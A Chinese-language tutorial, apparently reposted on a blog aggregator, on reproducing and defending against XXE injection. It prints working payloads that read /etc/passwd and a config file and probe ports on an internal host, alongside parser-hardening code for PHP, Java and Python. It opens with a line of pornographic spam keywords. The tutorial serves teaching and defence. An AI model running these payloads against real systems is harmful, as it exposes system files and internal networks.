国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

XXE漏洞復現(xiàn)步驟

這篇具有很好參考價值的文章主要介紹了XXE漏洞復現(xiàn)步驟。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

0X00XXE注入定義

XXE注入,即XML External Entity,XML外部實體注入。通過?XML?實體,”SYSTEM”關鍵詞導致?XML?解析器可以從本地文件或者遠程?URI?中讀取數(shù)據(jù)。所以攻擊者可以通過?XML?實體傳遞自己構造的惡意值,是處理程序解析它。當引用外部實體時,通過構造惡意內(nèi)容,可導致讀取任意文件、執(zhí)行系統(tǒng)命令、探測內(nèi)網(wǎng)端口、攻擊內(nèi)網(wǎng)網(wǎng)站等危害。

0X01漏洞原理

既然XML可以從外部讀取DTD文件,那我們就自然地想到了如果將路徑換成另一個文件的路徑,那么服務器在解析這個XML的時候就會把那個文件的內(nèi)容賦值給SYSTEM前面的根元素中,只要我們在XML中讓前面的根元素的內(nèi)容顯示出來,不就可以讀取那個文件的內(nèi)容了。這就造成了一個任意文件讀取的漏洞。

那如果我們指向的是一個內(nèi)網(wǎng)主機的端口呢?是否會給出錯誤信息,我們是不是可以從錯誤信息上來判斷內(nèi)網(wǎng)主機這個端口是否開放,這就造成了一個內(nèi)部端口被探測的問題。另外,一般來說,服務器解析XML有兩種方式,一種是一次性將整個XML加載進內(nèi)存中,進行解析;另一種是一部分一部分的、“流式”地加載、解析。如果我們遞歸地調(diào)用XML定義,一次性調(diào)用巨量的定義,那么服務器的內(nèi)存就會被消耗完,造成了拒絕服務攻擊。

0X02漏洞復現(xiàn)

發(fā)送測試代碼到測試服務器

<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]> <foo>&xxe;</foo>

在有回顯的情況下,該服務器的/etc/passwd文件就會被泄露。

此時發(fā)現(xiàn)有回顯,開始測試xxe漏洞,抓取數(shù)據(jù)包發(fā)現(xiàn)post一個xml文件

XXE漏洞復現(xiàn)步驟

將xml代碼換成測試的xml代碼

將其提交發(fā)現(xiàn)有回顯,回顯內(nèi)容是xml代碼里面的函數(shù)訪問文件夾的內(nèi)容。

XXE漏洞復現(xiàn)步驟

修改xml內(nèi)容進行端口檢測。

<!DOCTYPE foo [<!ELEMENT login ANY><!ENTITY xxe SYSTEM "http://192.168.1.42:801">]>
<reset><login>&xxe;</login><secret>Any bugs?</secret></reset>

XXE漏洞復現(xiàn)步驟

發(fā)現(xiàn)801端口關閉

<!DOCTYPE foo [<!ELEMENT login ANY><!ENTITY xxe SYSTEM "http://192.168.1.42:80">]>
<reset><login>&xxe;</login><secret>Any bugs?</secret></reset>

XXE漏洞復現(xiàn)步驟

發(fā)現(xiàn)80端口開啟

0X03漏洞防御

1.使用開發(fā)語言提供的禁用外部實體的方法

PHP:

libxml_disable_entity_loader(true);


JAVA:

DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();
dbf.setExpandEntityReferences(false);

Python:

from lxml import etree
xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))

2.過濾用戶提交的XML數(shù)據(jù)

?對變量:<!DOCTYPE和<!ENTITY,或者,SYSTEM和PUBLIC進行過濾.

例如,讓我們來試著定義一個新的自定義實體“harmless”。

<!DOCTYPE results [ <!ENTITY harmless "completely harmless"> ]>

現(xiàn)在,包含這個實體定義的XML文檔可以在任何允許的地方引用&harmless;實體。

from lxml import etree
xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))

XML解析器,例如PHP DOM,在解析這段XML時,會在加載完文檔后立即處理這個自定義實體。因此,請求相關文本時,會得到如下的返回:

This result is completely harmless

下面的這個就肯定不是無害的輸入:

<?xml version="1.0"?>
<!DOCTYPE results [<!ENTITY harmless SYSTEM
"file:///var/www/config.ini">]>
<results>
    <result>&harmless;</result>
</results>

3.檢查所使用的底層xml解析庫,默認禁止外部實體的解析
4.使用第三方應用代碼及時升級補丁
5.同時增強對系統(tǒng)的監(jiān)控,防止此問題被人利用
對于PHP,由于simplexml_load_string函數(shù)的XML解析問題出在libxml庫上,所以加載實體前可以調(diào)用這樣一個函數(shù)

<?php
libxml_disable_entity_loader(true);
?>

以進行防護,對于XMLReader和DOM方式解析,可以參考如下代碼:文章來源地址http://www.zghlxwxcb.cn/news/detail-499157.html

<?php
// with the XMLReader functionality:
$doc = XMLReader::xml($badXml,'UTF-8',LIBXML_NONET);
// with the DOM functionality:
$dom = new DOMDocument();
$dom->loadXML($badXml,LIBXML_DTDLOAD|LIBXML_DTDATTR);
?>>
 
<wiz_tmp_tag id="wiz-table-range-border" contenteditable="false" style="display: none;">

到了這里,關于XXE漏洞復現(xiàn)步驟的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權/違法違規(guī)/事實不符,請點擊違法舉報進行投訴反饋,一經(jīng)查實,立即刪除!

領支付寶紅包贊助服務器費用

相關文章

  • 紅帆OA SQL注入漏洞復現(xiàn)

    紅帆OA SQL注入漏洞復現(xiàn)

    ? ? 紅帆iOffice.net從最早滿足醫(yī)院行政辦公需求(傳統(tǒng)OA),到目前融合了衛(wèi)生主管部門的管理規(guī)范和眾多行業(yè)特色應用,是目前唯一定位于解決醫(yī)院綜合業(yè)務管理的軟件,是最符合醫(yī)院行業(yè)特點的醫(yī)院綜合業(yè)務管理平臺,是成功案例最多的醫(yī)院綜合業(yè)務管理軟件。 ??紅帆

    2024年02月12日
    瀏覽(26)
  • 【復現(xiàn)】SpringBlade SQL 注入漏洞_22

    【復現(xiàn)】SpringBlade SQL 注入漏洞_22

    目錄 一.概述 二 .漏洞影響 三.漏洞復現(xiàn) 1. 漏洞一: 四.修復建議: 五. 搜索語法: 六.免責聲明 SpringBlade 是由一個商業(yè)級項目升級優(yōu)化而來的SpringCloud微服務架構,采用Java8 API重構了業(yè)務代碼,完全遵循阿里巴巴編碼規(guī)范。 采用Spring Boot 2.7 、Spring Cloud 2021 、Mybatis 等核心技術

    2024年01月25日
    瀏覽(21)
  • 漏洞復現(xiàn)-金和OA GetAttOut接口SQL注入漏洞(附漏洞檢測腳本)

    漏洞復現(xiàn)-金和OA GetAttOut接口SQL注入漏洞(附漏洞檢測腳本)

    文章中涉及的漏洞均已修復,敏感信息均已做打碼處理,文章僅做經(jīng)驗分享用途,切勿當真,未授權的攻擊屬于非法行為!文章中敏感信息均已做多層打馬處理。傳播、利用本文章所提供的信息而造成的任何直接或者間接的后果及損失,均由使用者本人負責,作者不為此承擔

    2024年01月16日
    瀏覽(92)
  • CVE -2022-26134漏洞復現(xiàn)(Confluence OGNL 注入rce漏洞)

    CVE -2022-26134漏洞復現(xiàn)(Confluence OGNL 注入rce漏洞)

    0x01 Atlassian Confluence Atlassian Confluence是一個專業(yè)的企業(yè)知識管理與協(xié)同軟件,主要用于公司內(nèi)員工創(chuàng)建知識庫并建立知識管理流程,也可以用于構建企業(yè)wiki。其使用簡單,但它強大的編輯和站點管理特征能夠幫助團隊成員之間共享信息、文檔協(xié)作、集體討論,信息推送。因此

    2024年02月16日
    瀏覽(19)
  • 用友時空 KSOA 多處SQL注入漏洞復現(xiàn)

    用友時空 KSOA 多處SQL注入漏洞復現(xiàn)

    用友時空 KSOA 是建立在 SOA 理念指導下研發(fā)的新一代產(chǎn)品,是根據(jù)流通企業(yè)前沿的 IT 需求推出的統(tǒng)一的IT基礎架構,它可以讓流通企業(yè)各個時期建立的 IT 系統(tǒng)之間彼此輕松對話。 用友時空 KSOA 系統(tǒng) PayBill、QueryService、linkadd.jsp等接口處存在 sql 注入漏洞,攻擊者可通過這些漏洞

    2024年02月04日
    瀏覽(23)
  • 友點CMS GetSpecial SQL注入漏洞復現(xiàn)

    友點CMS GetSpecial SQL注入漏洞復現(xiàn)

    友點CMS是一款高效且靈活的網(wǎng)站管理系統(tǒng),它為用戶提供了簡單易用的界面和豐富的功能。無論是企業(yè)還是個人,都能通過友點CMS快速搭建出專業(yè)且美觀的網(wǎng)站。該系統(tǒng)支持多種內(nèi)容類型和自定義模板,方便用戶按需調(diào)整。同時,它具備強大的SEO功能,能提升網(wǎng)站在搜索引擎

    2024年02月20日
    瀏覽(86)
  • 【漏洞復現(xiàn)】SpringBlade export-user接口SQL注入漏洞

    【漏洞復現(xiàn)】SpringBlade export-user接口SQL注入漏洞

    SpringBlade 是一個由商業(yè)級項目升級優(yōu)化而來的微服務架構 采用Spring Boot 2.7 、Spring Cloud 2021 等核心技術構建,完全遵循阿里巴巴編碼規(guī)范。提供基于React和Vue的兩個前端框架用于快速搭建企業(yè)級的SaaS多租戶微服務平臺。 請勿利用文章內(nèi)的相關技術從事非法測試,由于傳播、利

    2024年01月24日
    瀏覽(24)
  • Django SQL注入漏洞復現(xiàn) (CVE-2022-28347)

    ? 在Django 2.2 的 2.2.28 之前版本、3.2 的 3.2.13 之前版本和 4.0 的 4.0.4 之前版本中的 QuerySet.deexplain() 中發(fā)現(xiàn)了SQL注入問題。這是通過傳遞一個精心編制的字典(帶有字典擴展)作為**options參數(shù)來實現(xiàn)的,并將注入負載放置在選項名稱中。 2.2 = Django 2.2.28 3.2 = Django 3.2.13 4.0 = Djan

    2024年02月05日
    瀏覽(23)
  • 用友GRP-U8 SQL注入漏洞復現(xiàn)

    用友GRP-U8 SQL注入漏洞復現(xiàn)

    ? ? 用友GRP-U8R10行政事業(yè)財務管理軟件是用友公司專注于國家電子政務事業(yè),基于云計算技術所推出的新一代產(chǎn)品,是我國行政事業(yè)財務領域最專業(yè)的政府財務管理軟件。 ?用友GRP-U8的bx_historyDataCheck jsp、slbmbygr.jsp等接口存在SQL注入漏洞,由于用友GRP-U8未對用戶的輸入進行有

    2024年02月07日
    瀏覽(20)
  • 漏洞復現(xiàn)-SpringBlade export-user SQL 注入漏洞(附漏洞檢測腳本)

    漏洞復現(xiàn)-SpringBlade export-user SQL 注入漏洞(附漏洞檢測腳本)

    文章中涉及的漏洞均已修復,敏感信息均已做打碼處理,文章僅做經(jīng)驗分享用途,切勿當真,未授權的攻擊屬于非法行為!文章中敏感信息均已做多層打馬處理。傳播、利用本文章所提供的信息而造成的任何直接或者間接的后果及損失,均由使用者本人負責,作者不為此承擔

    2024年01月22日
    瀏覽(23)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領取紅包,優(yōu)惠每天領

二維碼1

領取紅包

二維碼2

領紅包